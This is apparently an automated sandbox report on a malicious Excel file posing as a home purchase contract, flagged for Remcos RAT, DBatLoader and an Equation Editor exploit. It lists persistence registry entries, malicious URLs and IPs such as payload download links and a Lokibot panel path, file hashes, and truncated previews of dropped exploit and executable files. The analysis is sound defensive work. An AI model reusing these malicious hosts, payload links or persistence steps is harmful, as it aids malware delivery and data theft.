                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:14
                                Number of new started drivers analysed:1
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • GSI enabled (VBA)
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Home Purchase Contract and Property Details.xls
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.expl.evad.winXLS@9/31@13/6
                                EGA Information:
                                • Successful, ratio: 66.7%
                                HCA Information:
                                • Successful, ratio: 89%
                                • Number of executed functions: 79
                                • Number of non-executed functions: 218
                                Cookbook Comments:
                                • Found application associated with file extension: .xls
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Active ActiveX Object
                                • Active ActiveX Object
                                • Scroll down
                                • Close Viewer
                                • Override analysis time to 51516.3422873744 for current running targets taking high CPU consumption
                                • Override analysis time to 103032.684574749 for current running targets taking high CPU consumption
                                • Override analysis time to 206065.369149498 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, WMIADAP.exe
                                • Excluded IPs from analysis (whitelisted): 13.107.42.12
                                • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, odc-bl-files-geo.onedrive.akadns.net
                                • Execution Graph export aborted for target EQNEDT32.EXE, PID 3668 because there are no executed function
                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: Home Purchase Contract and Property Details.xls
                                TimeTypeDescription
                                11:21:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Efftwcmk C:\Users\Public\Efftwcmk.url
                                11:21:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Efftwcmk C:\Users\Public\Efftwcmk.url
                                14:21:02API Interceptor99x Sleep call for process: EQNEDT32.EXE modified
                                14:21:06API Interceptor8413562x Sleep call for process: csrss.exe modified
                                14:21:24API Interceptor8x Sleep call for process: Efftwcmk.PIF modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                150.171.41.11ZAM#U00d3WIENIE_NR.2405113.exeGet hashmaliciousDBatLoaderBrowse
                                  11650000000026213681.exeGet hashmaliciousDBatLoaderBrowse
                                    HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                      UGS - CRO REQ - KHIDUBAI (OPL-841724).scrGet hashmaliciousPureLog Stealer, zgRATBrowse
                                        20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                          20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                            ONISZCZUK ASSOCIATES Purchase Order.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                              82__GT7568.PDF.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                ref_00845-25-03-24.batGet hashmaliciousDBatLoaderBrowse
                                                  RFQ#30091.CMD.cmdGet hashmaliciousDBatLoaderBrowse
                                                    13.107.137.11Payment Remittance Advice_000000202213.xlsbGet hashmaliciousUnknownBrowse
                                                    • onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU
                                                    188.114.96.3SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
                                                    • rocheholding.top/evie3/five/fre.php
                                                    PI No 20000814C.exeGet hashmaliciousFormBookBrowse
                                                    • www.ilodezu.com/z48v/
                                                    https://m.exactag.com/ai.aspx?tc=d9069973bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atvlasestrellas.com%2Fxb%2F97956%2F%2FYy5tdXNjYXRAYW5kYXJpYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                    • tvlasestrellas.com/favicon.ico
                                                    http://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
                                                    • enter-mantagalaxies.com/
                                                    56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                                                    • qr-in.com/GDKZCby
                                                    Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • qr-in.com/atBVKxq
                                                    Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • qr-in.com/atBVKxq
                                                    20240403_Oferta factory..xlsGet hashmaliciousUnknownBrowse
                                                    • bitly.cx/owdri
                                                    file.exeGet hashmaliciousCMSBruteBrowse
                                                    • cutradition.com/pma/
                                                    20240403_Oferta factory..xlsGet hashmaliciousUnknownBrowse
                                                    • bitly.cx/owdri
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    dual-spov-0006.spov-dc-msedge.netZAM#U00d3WIENIE_NR.2405113.exeGet hashmaliciousDBatLoaderBrowse
                                                    • 150.171.41.11
                                                    11650000000026213681.exeGet hashmaliciousDBatLoaderBrowse
                                                    • 150.171.41.11
                                                    HFiHWvPsvA.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 150.171.41.11
                                                    UGS - CRO REQ - KHIDUBAI (OPL-841724).scrGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                    • 150.171.41.11
                                                    20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                    • 150.171.43.11
                                                    20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                    • 150.171.41.11
                                                    DHL Shipping Documents_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                    • 150.171.43.11
                                                    ONISZCZUK ASSOCIATES Purchase Order.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 150.171.41.11
                                                    82__GT7568.PDF.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                    • 150.171.41.11
                                                    CONFIRMATION ORDER1.batGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                    • 150.171.43.11
                                                    dual-spov-0006.spov-msedge.netCOMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • 13.107.139.11
                                                    Adro_ Documents.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 13.107.137.11
                                                    #U015eirket Evrklar#U0131.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                    • 13.107.139.11
                                                    ZAM#U00d3WIENIE_NR.2405113.exeGet hashmaliciousDBatLoaderBrowse
                                                    • 13.107.139.11
                                                    https://drivestorage.live/b/shared/lNyF6ygGGet hashmaliciousUnknownBrowse
                                                    • 13.107.137.11
                                                    11650000000026213681.exeGet hashmaliciousDBatLoaderBrowse
                                                    • 13.107.139.11
                                                    11650000000026213681.exeGet hashmaliciousDBatLoaderBrowse
                                                    • 13.107.139.11
                                                    ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                    • 13.107.139.11
                                                    ORDEN_NR2405073.exeGet hashmaliciousDBatLoaderBrowse
                                                    • 13.107.137.11
                                                    ORDEN_NR2405073.exeGet hashmaliciousDBatLoaderBrowse
                                                    • 13.107.137.11
                                                    qr-in.comPO 4500025813.xlsGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    56882720_50174358_2024-05-23_203027.xlsGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    Enquiry No. 2421005.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    ORDIN.xlsGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    ORDIN.xlsGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    ORDIN.xlsGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    geoplugin.netz10Original-Copy.bat.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    #Inv_PI_{number_12}_pdf.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    msimg32.dllGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Adro_ Documents.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 178.237.33.50
                                                    #U015eirket Evrklar#U0131.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    Shipping document.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    Shipping Docu + BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    1716402730d4367c609f5dbfd372f292f11d4ae5e9638f588c70bba3bb92209e7ce6b766d4284.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    1716402727777c162c75a91e4b3e07db32916dbe59531408a29e7b737ba3b7c717173a0c28980.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    17164027273924b1df179f71bcdb4f6ddb0b6e02da51a5acba32646b7f91c4ab7945caaa21327.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    MICROSOFT-CORP-MSN-AS-BLOCKUSOffer Document 24.lnkGet hashmaliciousFormBookBrowse
                                                    • 20.86.128.223
                                                    https://downloads.imazing.com/windows/iMazing/iMazing3forWindows.exeGet hashmaliciousPureLog StealerBrowse
                                                    • 20.22.113.133
                                                    https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                    • 51.138.215.192
                                                    https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                                                    • 94.245.104.56
                                                    https://cinematronix-my.sharepoint.com/:b:/g/personal/graeme_cinematronix_net/EaZ0z51iAxdJn-ugpkcdZ_cBkrvCfEjmBY1pEk79hr1h2Q?e=SJ969VGet hashmaliciousUnknownBrowse
                                                    • 52.104.56.27
                                                    https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.213.45
                                                    https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.213.60
                                                    http://info.ipreo.com/Privacy-Policy.htmlGet hashmaliciousUnknownBrowse
                                                    • 20.190.249.200
                                                    https://laurabingham.org/wp-content/plugins/wp-recipe-maker/downexcel.phpGet hashmaliciousUnknownBrowse
                                                    • 52.109.32.97
                                                    COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • 13.107.139.11
                                                    THEZONEBGV8Y8niXzmL.elfGet hashmaliciousGafgytBrowse
                                                    • 91.92.240.85
                                                    6ZGQp03KWF.elfGet hashmaliciousGafgytBrowse
                                                    • 91.92.240.85
                                                    8LcL1JKgoC.elfGet hashmaliciousGafgytBrowse
                                                    • 91.92.240.85
                                                    e2PfBoVX8B.elfGet hashmaliciousGafgytBrowse
                                                    • 91.92.240.85
                                                    DIINNdhQCF.elfGet hashmaliciousGafgytBrowse
                                                    • 91.92.240.85
                                                    XooIXdKFaW.elfGet hashmaliciousGafgytBrowse
                                                    • 91.92.240.85
                                                    AIFbR8t1fj.elfGet hashmaliciousGafgytBrowse
                                                    • 91.92.240.85
                                                    bDPV6D6zlx.elfGet hashmaliciousGafgytBrowse
                                                    • 91.92.240.85
                                                    QuXveZg4s6.elfGet hashmaliciousGafgytBrowse
                                                    • 91.92.240.85
                                                    TqSaHq3efJ.elfGet hashmaliciousGafgytBrowse
                                                    • 91.92.240.85
                                                    MICROSOFT-CORP-MSN-AS-BLOCKUSOffer Document 24.lnkGet hashmaliciousFormBookBrowse
                                                    • 20.86.128.223
                                                    https://downloads.imazing.com/windows/iMazing/iMazing3forWindows.exeGet hashmaliciousPureLog StealerBrowse
                                                    • 20.22.113.133
                                                    https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                    • 51.138.215.192
                                                    https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                                                    • 94.245.104.56
                                                    https://cinematronix-my.sharepoint.com/:b:/g/personal/graeme_cinematronix_net/EaZ0z51iAxdJn-ugpkcdZ_cBkrvCfEjmBY1pEk79hr1h2Q?e=SJ969VGet hashmaliciousUnknownBrowse
                                                    • 52.104.56.27
                                                    https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.213.45
                                                    https://cvg.soundestlink.com/ce/c/664ca6751ccee38188772900/664ca68b4377806862523922/664ca6a4ff5940ee5651226c?signature=792c75b9eb10e4c670e5817e159b98793c0887d427c5dd08ed514bd14c9193e4Get hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.213.60
                                                    http://info.ipreo.com/Privacy-Policy.htmlGet hashmaliciousUnknownBrowse
                                                    • 20.190.249.200
                                                    https://laurabingham.org/wp-content/plugins/wp-recipe-maker/downexcel.phpGet hashmaliciousUnknownBrowse
                                                    • 52.109.32.97
                                                    COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • 13.107.139.11
                                                    TERASYST-ASBGSwift mt103 483932024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 94.156.67.228
                                                    1716402308262aedf7d56a024eb3c1ba5eacf734db4f110a1cdb89ce86eee5e5f3269b8667772.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 94.156.69.96
                                                    5021036673.exeGet hashmaliciousNanocore, AgentTesla, PureLog StealerBrowse
                                                    • 94.156.68.219
                                                    hwUz69Q8ZN.exeGet hashmaliciousXWormBrowse
                                                    • 94.156.68.231
                                                    Swift copy.exeGet hashmaliciousXWormBrowse
                                                    • 94.156.68.231
                                                    IMG1024785000.exeGet hashmaliciousNanocore, AgentTesla, PureLog StealerBrowse
                                                    • 94.156.68.219
                                                    15qMoP89vl.elfGet hashmaliciousUnknownBrowse
                                                    • 94.156.68.228
                                                    ZQYQWLpDEQ.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 94.156.71.230
                                                    kI6xUIRFpY.elfGet hashmaliciousUnknownBrowse
                                                    • 94.156.68.228
                                                    PAYMENT COPY 02521.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                                    • 94.156.68.219
                                                    CLOUDFLARENETUSOffer Document 24.lnkGet hashmaliciousFormBookBrowse
                                                    • 23.227.38.74
                                                    PO 4500025813.xlsGet hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                                    • 104.21.25.77
                                                    https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                                    • 172.67.223.248
                                                    SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
                                                    • 188.114.97.9
                                                    V_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                                                    • 172.67.217.192
                                                    kam.cmdGet hashmaliciousGuLoaderBrowse
                                                    • 104.21.28.80
                                                    https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                                                    • 104.21.39.66
                                                    https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                                                    • 172.64.154.146
                                                    http://all4promos.comGet hashmaliciousUnknownBrowse
                                                    • 162.247.243.29
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    05af1f5ca1b87cc9cc9b25185115607d1080.xlsGet hashmaliciousUnknownBrowse
                                                    • 13.107.137.11
                                                    Sipari#U015f detaylar#U0131.xlsGet hashmaliciousUnknownBrowse
                                                    • 13.107.137.11
                                                    Drwg.xlsGet hashmaliciousUnknownBrowse
                                                    • 13.107.137.11
                                                    Pepsico RFQ_P1005712.xlsGet hashmaliciousGuLoaderBrowse
                                                    • 13.107.137.11
                                                    ENQUIRY OFFER.xlsGet hashmaliciousFormBookBrowse
                                                    • 13.107.137.11
                                                    PHARMACEUTICAL ORDER.xlsGet hashmaliciousUnknownBrowse
                                                    • 13.107.137.11
                                                    Plat#U0103 Factura MTL11852.xlsGet hashmaliciousRemcosBrowse
                                                    • 13.107.137.11
                                                    PON2401071.xlsGet hashmaliciousRemcosBrowse
                                                    • 13.107.137.11
                                                    irlforme.docGet hashmaliciousUnknownBrowse
                                                    • 13.107.137.11
                                                    PURCHASE ORDER_REQUEST.xla.xlsxGet hashmaliciousUnknownBrowse
                                                    • 13.107.137.11
                                                    No context
                                                    Process:C:\Users\user\AppData\Roaming\csrss.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):476
                                                    Entropy (8bit):3.548383379550099
                                                    Encrypted:false
                                                    SSDEEP:6:6lGGRSE5YcIeeDAlS6lVYwSySNombQDyFAe5q1Ae5ryFgWA7DxbN2fBMMm0v:6lDecLliwhykle5De5rXWItN25MMl
                                                    MD5:E9DDF5BA9EB284BC4948239EA95BF761
                                                    SHA1:ABF6A4E81EFA869EA412A0FA9857083BD851C9D9
                                                    SHA-256:B5F8791F1E3F7397141054055A6B577BDFB09DB91971A33BE7849E1DA81602DA
                                                    SHA-512:8992D04CE7E6E5FDECA66143FA2A6B061483EC7AB8FD866C78AC220184090AAE5062AC21A265CB54AF1EE24E4D68807C6BD65F9670F8136D7E752D33AA30A603
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\notes\logs.dat, Author: Joe Security
                                                    Reputation:low
                                                    Preview:....[.2.0.2.4./.0.5./.2.3. .1.4.:.2.1.:.1.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.N.A.v.S.G.z.Z. .[.R.e.a.d.-.O.n.l.y.]. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l.].....[.W.i.n.].r.....[.R.u.n.].....[.W.i.n.].r.....[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):0.02568179153757395
                                                    Encrypted:false
                                                    SSDEEP:6:I3DPcHnCvxggLRbQ4UrZzFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPT3Q4yZfvYg3J/
                                                    MD5:1CA4F988D7E4EF4BADE6AF3F29DCFCDC
                                                    SHA1:8585098DF832531CF158AEAAAEF3977304D021A6
                                                    SHA-256:ED9BDFD3E586DB7D368C8EB197A370468FB5925C495ACFD74EDD17C6562F2E74
                                                    SHA-512:F5BD06AE0142152CA9FE111D7A36D947C4AAC12D2E246ECA611ADF038178814A36C998864DE4419CBAA4FD3F79C9C04E991ED39996014C55295BAEE61FB80379
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:......M.eFy...z..v.O..E..;....MS,...X.F...Fa.q.............................*..7..I.0) ".............;...A..t..:.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Roaming\csrss.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):963
                                                    Entropy (8bit):5.0179389973066115
                                                    Encrypted:false
                                                    SSDEEP:12:tkluand6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluWdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                    MD5:6B1D67591EF4EACFA44DA4A6EA0650AA
                                                    SHA1:E656CCCB39B6DF75860136F91CDB011FACAB4609
                                                    SHA-256:6AEB14C82544F677D77650FE6144D5B3FDA8669B2C105DA3A3433B4E3EAE8AB1
                                                    SHA-512:DC3D7E3819B11140A7CC11B637C6B74DBD92AFAD377CBE0A2775D6F7D4CB752E7EC888A82F619242887EBA173CFAEC2F2A1926487B05C7418AAA73DD11DF9C6A
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:{. "geoplugin_request":"8.46.123.175",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ISO-8859 text, with very long lines (5166), with CRLF, CR, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):37178
                                                    Entropy (8bit):3.5174036971121247
                                                    Encrypted:false
                                                    SSDEEP:384:VhZXB+50YucHlzQ5T/jlCOTbtbYtcQIukOOOjovKd4gqZjRiOMM2L42IVmJQzL+t:VhZg2Y/0T0Tc038lZZvmFn
                                                    MD5:E22EC5F92111A7CA5FC66630C27C7BB9
                                                    SHA1:E2D0AC4192C7C961F561678750299292DDCDDCA8
                                                    SHA-256:1761EC4983A70F982282C58697628F98C42E8F2197874BE62348445A53CCE51A
                                                    SHA-512:A292DC5C0BB8740481AD9CD22F51175E3A640115D440034633498FDE7345B29C12BD203AFED50B6889FEB427CC69A93E1A95070DA7B860F494231A12D85B1F3A
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Reputation:low
                                                    Preview:{\rt..............{\*\fillDztype300836618 \.}.{\529557164.!3&,[9%-4?~`%0)@3!#.~~0:/?09/?1.0$,*???48%:|9;@@,_|<'%),'1+=.6%$7.@?.984;.0>|.%1^8]58~[&'6`2)?6#?=-2@<>;.[*6'8/:#52-:,%;=00[<)???#>-8'-?#!.<~8]%/?/.|@''%'0?'9_.$@60..5;[+6|)`%]!16)3(?7&_%$|'~^?(11.*/74??%2#8%/?~)5,/0?.52??;$>.]+'?^~6(?.$8)*9;?>_?.%37?[.5?3(8(/~:#2[6?&+%|?86!5(3?!8-*(5$%&-%[('%/?43-|6|/>?&??5:;'[+59&;9!>|@[(??8]]35?*??.`?.5+..!.<[%<3?~6@?89/=>(=?<+6??5~)5:*$@.~5<<:)#,1;?>($#>#4[45<~+[-:?6-<5.*??8-1%?6'=9?|!~1__7):/0'(?:(&'?]($/)7%5|+2.8(&/<,;.?*_($84#/*7%+?8.*)~$`3.#,.])-3/2_?<.?%>.?.4.=?%87?0[?51#_4.#^(39`@~?~~|@66=`@0%~#?)?-!7_#?$<3[%2|)<9&.<??'8;%]?1?[2,'[5;5(??@[2%?=5??@*5$(!.=?~!|3?~`.`!)?3#05..~62$?</+>.56;/<?,%;97('-8.:?@2(?,>22^?732`4./[7/(%66*_=)*(]0645-.6-,4`?.4.5_|9(2$1$??4(-|.#?9?.??:.0;:..49;|&?.6/./.?[,0#.-/24|.%<+,=%[#5?;!?-4='-%437(&$]9.9[1@?.:?8?6.9'+?<5.~+.?>),?(.:|79@8??[51?<*9?]-;;(@&4)2/^8.(]67('!9$$3:`.&2~'3<:*?.*$$._?=?-??./.|!*&1^#<49_>50?^.?_?5,_###;#^:~*21@.?=-3@!#_!:%<4=8~:|]=(!'-^./@.-
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1388544
                                                    Entropy (8bit):5.5299258127514435
                                                    Encrypted:false
                                                    SSDEEP:24576:AP+g7Wy3xfMZKdcKtTjbJ4HEEEEEEEEEEEEEEEEEEEETKKKKKKKKKKKKKKKKKKK7:A/iy3g6TjbsEEEEEEEEEEEEEEEEEEEE+
                                                    MD5:913C99449A29C2640D36B0D5FDF69289
                                                    SHA1:858971F52AB45DC8BE5F2C43DA9B0C25BA398435
                                                    SHA-256:39475882127FD9789D9C23444153A4A4841F3FFBB34FFABB0C540E6E9D76D034
                                                    SHA-512:B35A9A28D01A948455DA4D078D9F9D1AACB5E9FFF5C8359B4278400E29296C75FF96554AE6CC8CD4F53D1DB8525D43927C87B793E3FB2E72549D944FD62A6D96
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                    Reputation:low
                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......(.............@..............................................@...........................@..@%...............................k...................................................F...............................text............................... ..`.itext..p<.......>.................. ..`.data...P...........................@....bss.....6...............................idata..@%...@...&..................@....tls....4....p...........................rdata..............................@..@.reloc...k.......l..................@..B.rsrc................t..............@..@.....................0..............@..@................................................................................................
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):43884
                                                    Entropy (8bit):3.126772283765275
                                                    Encrypted:false
                                                    SSDEEP:384:r8kX2fappvT5WyjVG3FzDjZCaI5FHtHFuYP:rxNLNjVwGFHtHFvP
                                                    MD5:DC215B4EFF44EBE3A5F50911BC201283
                                                    SHA1:A2AE0A6D9E4AA92D7EAFF947D4E53F2DA1A6D657
                                                    SHA-256:9DDC1CDF5B5730F2C4A08B6744D119C1BAB9FADA452645563E7E7DBE4907E89D
                                                    SHA-512:C9BBB1B7B79D8D3F63488A098CF9D437B352B38ABB43E2755B019418F393A5DC80E241FCD102430A6BB7F25CC72C5C324397D6CE8E55E1FB035D2B24B7E9172C
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:....l...........;...............~@..xW.. EMF....l...........................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................=........................................ .E..........................G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o.........6...............P...................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... ...,...............T...T...X...........q........i.@...@X...Z.......L...............<...
